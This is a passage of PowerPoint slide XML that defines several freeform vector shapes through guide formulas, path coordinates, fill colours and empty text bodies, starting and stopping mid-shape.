                  <a:gd name="T64" fmla="*/ 27 w 79"/>
                  <a:gd name="T65" fmla="*/ 88 h 91"/>
                  <a:gd name="T66" fmla="*/ 32 w 79"/>
                  <a:gd name="T67" fmla="*/ 87 h 91"/>
                  <a:gd name="T68" fmla="*/ 38 w 79"/>
                  <a:gd name="T69" fmla="*/ 88 h 91"/>
                  <a:gd name="T70" fmla="*/ 44 w 79"/>
                  <a:gd name="T71" fmla="*/ 88 h 91"/>
                  <a:gd name="T72" fmla="*/ 50 w 79"/>
                  <a:gd name="T73" fmla="*/ 88 h 91"/>
                  <a:gd name="T74" fmla="*/ 57 w 79"/>
                  <a:gd name="T75" fmla="*/ 88 h 91"/>
                  <a:gd name="T76" fmla="*/ 64 w 79"/>
                  <a:gd name="T77" fmla="*/ 89 h 91"/>
                  <a:gd name="T78" fmla="*/ 71 w 79"/>
                  <a:gd name="T79" fmla="*/ 90 h 91"/>
                  <a:gd name="T80" fmla="*/ 79 w 79"/>
                  <a:gd name="T81" fmla="*/ 91 h 91"/>
                  <a:gd name="T82" fmla="*/ 79 w 79"/>
                  <a:gd name="T83" fmla="*/ 88 h 91"/>
                  <a:gd name="T84" fmla="*/ 78 w 79"/>
                  <a:gd name="T85" fmla="*/ 81 h 91"/>
                  <a:gd name="T86" fmla="*/ 77 w 79"/>
                  <a:gd name="T87" fmla="*/ 70 h 91"/>
                  <a:gd name="T88" fmla="*/ 76 w 79"/>
                  <a:gd name="T89" fmla="*/ 57 h 91"/>
                  <a:gd name="T90" fmla="*/ 76 w 79"/>
                  <a:gd name="T91" fmla="*/ 43 h 91"/>
                  <a:gd name="T92" fmla="*/ 76 w 79"/>
                  <a:gd name="T93" fmla="*/ 28 h 91"/>
                  <a:gd name="T94" fmla="*/ 77 w 79"/>
                  <a:gd name="T95" fmla="*/ 15 h 91"/>
                  <a:gd name="T96" fmla="*/ 78 w 79"/>
                  <a:gd name="T97" fmla="*/ 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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 91"/>
                  <a:gd name="T149" fmla="*/ 79 w 79"/>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9" h="91">
                    <a:moveTo>
                      <a:pt x="78" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10615" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1295" y="2837"/>
                <a:ext cx="132" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 132"/>
                  <a:gd name="T1" fmla="*/ 67 h 90"/>
                  <a:gd name="T2" fmla="*/ 0 w 132"/>
                  <a:gd name="T3" fmla="*/ 79 h 90"/>
                  <a:gd name="T4" fmla="*/ 86 w 132"/>
                  <a:gd name="T5" fmla="*/ 90 h 90"/>
                  <a:gd name="T6" fmla="*/ 86 w 132"/>
                  <a:gd name="T7" fmla="*/ 90 h 90"/>
                  <a:gd name="T8" fmla="*/ 89 w 132"/>
                  <a:gd name="T9" fmla="*/ 88 h 90"/>
                  <a:gd name="T10" fmla="*/ 91 w 132"/>
                  <a:gd name="T11" fmla="*/ 87 h 90"/>
                  <a:gd name="T12" fmla="*/ 94 w 132"/>
                  <a:gd name="T13" fmla="*/ 85 h 90"/>
                  <a:gd name="T14" fmla="*/ 98 w 132"/>
                  <a:gd name="T15" fmla="*/ 83 h 90"/>
                  <a:gd name="T16" fmla="*/ 103 w 132"/>
                  <a:gd name="T17" fmla="*/ 79 h 90"/>
                  <a:gd name="T18" fmla="*/ 107 w 132"/>
                  <a:gd name="T19" fmla="*/ 76 h 90"/>
                  <a:gd name="T20" fmla="*/ 112 w 132"/>
                  <a:gd name="T21" fmla="*/ 71 h 90"/>
                  <a:gd name="T22" fmla="*/ 117 w 132"/>
                  <a:gd name="T23" fmla="*/ 66 h 90"/>
                  <a:gd name="T24" fmla="*/ 121 w 132"/>
                  <a:gd name="T25" fmla="*/ 60 h 90"/>
                  <a:gd name="T26" fmla="*/ 125 w 132"/>
                  <a:gd name="T27" fmla="*/ 55 h 90"/>
                  <a:gd name="T28" fmla="*/ 128 w 132"/>
                  <a:gd name="T29" fmla="*/ 47 h 90"/>
                  <a:gd name="T30" fmla="*/ 131 w 132"/>
                  <a:gd name="T31" fmla="*/ 39 h 90"/>
                  <a:gd name="T32" fmla="*/ 132 w 132"/>
                  <a:gd name="T33" fmla="*/ 31 h 90"/>
                  <a:gd name="T34" fmla="*/ 132 w 132"/>
                  <a:gd name="T35" fmla="*/ 23 h 90"/>
                  <a:gd name="T36" fmla="*/ 129 w 132"/>
                  <a:gd name="T37" fmla="*/ 14 h 90"/>
                  <a:gd name="T38" fmla="*/ 129 w 132"/>
                  <a:gd name="T39" fmla="*/ 12 h 90"/>
                  <a:gd name="T40" fmla="*/ 128 w 132"/>
                  <a:gd name="T41" fmla="*/ 11 h 90"/>
                  <a:gd name="T42" fmla="*/ 127 w 132"/>
                  <a:gd name="T43" fmla="*/ 9 h 90"/>
                  <a:gd name="T44" fmla="*/ 126 w 132"/>
                  <a:gd name="T45" fmla="*/ 7 h 90"/>
                  <a:gd name="T46" fmla="*/ 124 w 132"/>
                  <a:gd name="T47" fmla="*/ 4 h 90"/>
                  <a:gd name="T48" fmla="*/ 120 w 132"/>
                  <a:gd name="T49" fmla="*/ 2 h 90"/>
                  <a:gd name="T50" fmla="*/ 117 w 132"/>
                  <a:gd name="T51" fmla="*/ 1 h 90"/>
                  <a:gd name="T52" fmla="*/ 113 w 132"/>
                  <a:gd name="T53" fmla="*/ 0 h 90"/>
                  <a:gd name="T54" fmla="*/ 113 w 132"/>
                  <a:gd name="T55" fmla="*/ 2 h 90"/>
                  <a:gd name="T56" fmla="*/ 114 w 132"/>
                  <a:gd name="T57" fmla="*/ 5 h 90"/>
                  <a:gd name="T58" fmla="*/ 117 w 132"/>
                  <a:gd name="T59" fmla="*/ 11 h 90"/>
                  <a:gd name="T60" fmla="*/ 118 w 132"/>
                  <a:gd name="T61" fmla="*/ 19 h 90"/>
                  <a:gd name="T62" fmla="*/ 118 w 132"/>
                  <a:gd name="T63" fmla="*/ 29 h 90"/>
                  <a:gd name="T64" fmla="*/ 117 w 132"/>
                  <a:gd name="T65" fmla="*/ 39 h 90"/>
                  <a:gd name="T66" fmla="*/ 114 w 132"/>
                  <a:gd name="T67" fmla="*/ 51 h 90"/>
                  <a:gd name="T68" fmla="*/ 108 w 132"/>
                  <a:gd name="T69" fmla="*/ 64 h 90"/>
                  <a:gd name="T70" fmla="*/ 108 w 132"/>
                  <a:gd name="T71" fmla="*/ 64 h 90"/>
                  <a:gd name="T72" fmla="*/ 108 w 132"/>
                  <a:gd name="T73" fmla="*/ 64 h 90"/>
                  <a:gd name="T74" fmla="*/ 107 w 132"/>
                  <a:gd name="T75" fmla="*/ 65 h 90"/>
                  <a:gd name="T76" fmla="*/ 106 w 132"/>
                  <a:gd name="T77" fmla="*/ 66 h 90"/>
                  <a:gd name="T78" fmla="*/ 105 w 132"/>
                  <a:gd name="T79" fmla="*/ 66 h 90"/>
                  <a:gd name="T80" fmla="*/ 103 w 132"/>
                  <a:gd name="T81" fmla="*/ 67 h 90"/>
                  <a:gd name="T82" fmla="*/ 100 w 132"/>
                  <a:gd name="T83" fmla="*/ 69 h 90"/>
                  <a:gd name="T84" fmla="*/ 98 w 132"/>
                  <a:gd name="T85" fmla="*/ 70 h 90"/>
                  <a:gd name="T86" fmla="*/ 96 w 132"/>
                  <a:gd name="T87" fmla="*/ 71 h 90"/>
                  <a:gd name="T88" fmla="*/ 92 w 132"/>
                  <a:gd name="T89" fmla="*/ 72 h 90"/>
                  <a:gd name="T90" fmla="*/ 90 w 132"/>
                  <a:gd name="T91" fmla="*/ 72 h 90"/>
                  <a:gd name="T92" fmla="*/ 85 w 132"/>
                  <a:gd name="T93" fmla="*/ 73 h 90"/>
                  <a:gd name="T94" fmla="*/ 82 w 132"/>
                  <a:gd name="T95" fmla="*/ 73 h 90"/>
                  <a:gd name="T96" fmla="*/ 78 w 132"/>
                  <a:gd name="T97" fmla="*/ 73 h 90"/>
                  <a:gd name="T98" fmla="*/ 73 w 132"/>
                  <a:gd name="T99" fmla="*/ 72 h 90"/>
                  <a:gd name="T100" fmla="*/ 69 w 132"/>
                  <a:gd name="T101" fmla="*/ 72 h 90"/>
                  <a:gd name="T102" fmla="*/ 69 w 132"/>
                  <a:gd name="T103" fmla="*/ 84 h 90"/>
                  <a:gd name="T104" fmla="*/ 3 w 132"/>
                  <a:gd name="T105" fmla="*/ 77 h 90"/>
                  <a:gd name="T106" fmla="*/ 1 w 132"/>
                  <a:gd name="T107" fmla="*/ 67 h 9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2"/>
                  <a:gd name="T163" fmla="*/ 0 h 90"/>
                  <a:gd name="T164" fmla="*/ 132 w 132"/>
                  <a:gd name="T165" fmla="*/ 90 h 9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2" h="90">
                    <a:moveTo>
                      <a:pt x="1" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="67"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10616" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1279" y="2925"/>
                <a:ext cx="96" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 96"/>
                  <a:gd name="T1" fmla="*/ 12 h 32"/>
                  <a:gd name="T2" fmla="*/ 1 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 96"/>
                  <a:gd name="T5" fmla="*/ 12 h 32"/>
                  <a:gd name="T6" fmla="*/ 93 w 96"/>
                  <a:gd name="T7" fmla="*/ 32 h 32"/>
                  <a:gd name="T8" fmla="*/ 96 w 96"/>
                  <a:gd name="T9" fmla="*/ 12 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 96"/>
                  <a:gd name="T16" fmla="*/ 0 h 32"/>
                  <a:gd name="T17" fmla="*/ 96 w 96"/>
                  <a:gd name="T18" fmla="*/ 32 h 32"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="96" h="32">
                    <a:moveTo>
                      <a:pt x="96" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="12"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10617" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1326" y="2936"/>
                <a:ext cx="42" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 42"/>
                  <a:gd name="T1" fmla="*/ 6 h 14"/>
                  <a:gd name="T2" fmla="*/ 2 w 42"/>
                  <a:gd name="T3" fmla="*/ 0 h 14"/>
                  <a:gd name="T4" fmla="*/ 0 w 42"/>
                  <a:gd name="T5" fmla="*/ 6 h 14"/>
                  <a:gd name="T6" fmla="*/ 40 w 42"/>
                  <a:gd name="T7" fmla="*/ 14 h 14"/>
                  <a:gd name="T8" fmla="*/ 42 w 42"/>
                  <a:gd name="T9" fmla="*/ 6 h 14"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 42"/>
                  <a:gd name="T16" fmla="*/ 0 h 14"/>
                  <a:gd name="T17" fmla="*/ 42 w 42"/>
                  <a:gd name="T18" fmla="*/ 14 h 14"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="42" h="14">
                    <a:moveTo>
                      <a:pt x="42" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10618" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1284" y="2929"/>
                <a:ext cx="28" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 28"/>
                  <a:gd name="T1" fmla="*/ 5 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 28"/>
                  <a:gd name="T3" fmla="*/ 0 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 5 h 10"/>
                  <a:gd name="T6" fmla="*/ 27 w 28"/>
                  <a:gd name="T7" fmla="*/ 10 h 10"/>
                  <a:gd name="T8" fmla="*/ 28 w 28"/>
                  <a:gd name="T9" fmla="*/ 5 h 10"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 28"/>
                  <a:gd name="T16" fmla="*/ 0 h 10"/>
                  <a:gd name="T17" fmla="*/ 28 w 28"/>
                  <a:gd name="T18" fmla="*/ 10 h 10"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="28" h="10">
                    <a:moveTo>
                      <a:pt x="28" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10619" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1216" y="2938"/>
                <a:ext cx="162" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 162"/>
                  <a:gd name="T1" fmla="*/ 17 h 55"/>
                  <a:gd name="T2" fmla="*/ 0 w 162"/>
                  <a:gd name="T3" fmla="*/ 17 h 55"/>
                  <a:gd name="T4" fmla="*/ 1 w 162"/>
                  <a:gd name="T5" fmla="*/ 17 h 55"/>
                  <a:gd name="T6" fmla="*/ 2 w 162"/>
                  <a:gd name="T7" fmla="*/ 17 h 55"/>
                  <a:gd name="T8" fmla="*/ 4 w 162"/>
                  <a:gd name="T9" fmla="*/ 15 h 55"/>
                  <a:gd name="T10" fmla="*/ 7 w 162"/>
                  <a:gd name="T11" fmla="*/ 15 h 55"/>
                  <a:gd name="T12" fmla="*/ 10 w 162"/>
                  <a:gd name="T13" fmla="*/ 15 h 55"/>
                  <a:gd name="T14" fmla="*/ 14 w 162"/>
                  <a:gd name="T15" fmla="*/ 14 h 55"/>
                  <a:gd name="T16" fmla="*/ 17 w 162"/>
                  <a:gd name="T17" fmla="*/ 13 h 55"/>
                  <a:gd name="T18" fmla="*/ 21 w 162"/>
                  <a:gd name="T19" fmla="*/ 12 h 55"/>
                  <a:gd name="T20" fmla="*/ 24 w 162"/>
                  <a:gd name="T21" fmla="*/ 11 h 55"/>
                  <a:gd name="T22" fmla="*/ 28 w 162"/>
                  <a:gd name="T23" fmla="*/ 10 h 55"/>
                  <a:gd name="T24" fmla="*/ 31 w 162"/>
                  <a:gd name="T25" fmla="*/ 8 h 55"/>
                  <a:gd name="T26" fmla="*/ 35 w 162"/>
                  <a:gd name="T27" fmla="*/ 6 h 55"/>
                  <a:gd name="T28" fmla="*/ 37 w 162"/>
                  <a:gd name="T29" fmla="*/ 5 h 55"/>
                  <a:gd name="T30" fmla="*/ 40 w 162"/>
                  <a:gd name="T31" fmla="*/ 3 h 55"/>
                  <a:gd name="T32" fmla="*/ 43 w 162"/>
                  <a:gd name="T33" fmla="*/ 0 h 55"/>
                  <a:gd name="T34" fmla="*/ 162 w 162"/>
                  <a:gd name="T35" fmla="*/ 28 h 55"/>
                  <a:gd name="T36" fmla="*/ 162 w 162"/>
                  <a:gd name="T37" fmla="*/ 28 h 55"/>
                  <a:gd name="T38" fmla="*/ 161 w 162"/>
                  <a:gd name="T39" fmla="*/ 29 h 55"/>
                  <a:gd name="T40" fmla="*/ 159 w 162"/>
                  <a:gd name="T41" fmla="*/ 31 h 55"/>
                  <a:gd name="T42" fmla="*/ 158 w 162"/>
                  <a:gd name="T43" fmla="*/ 32 h 55"/>
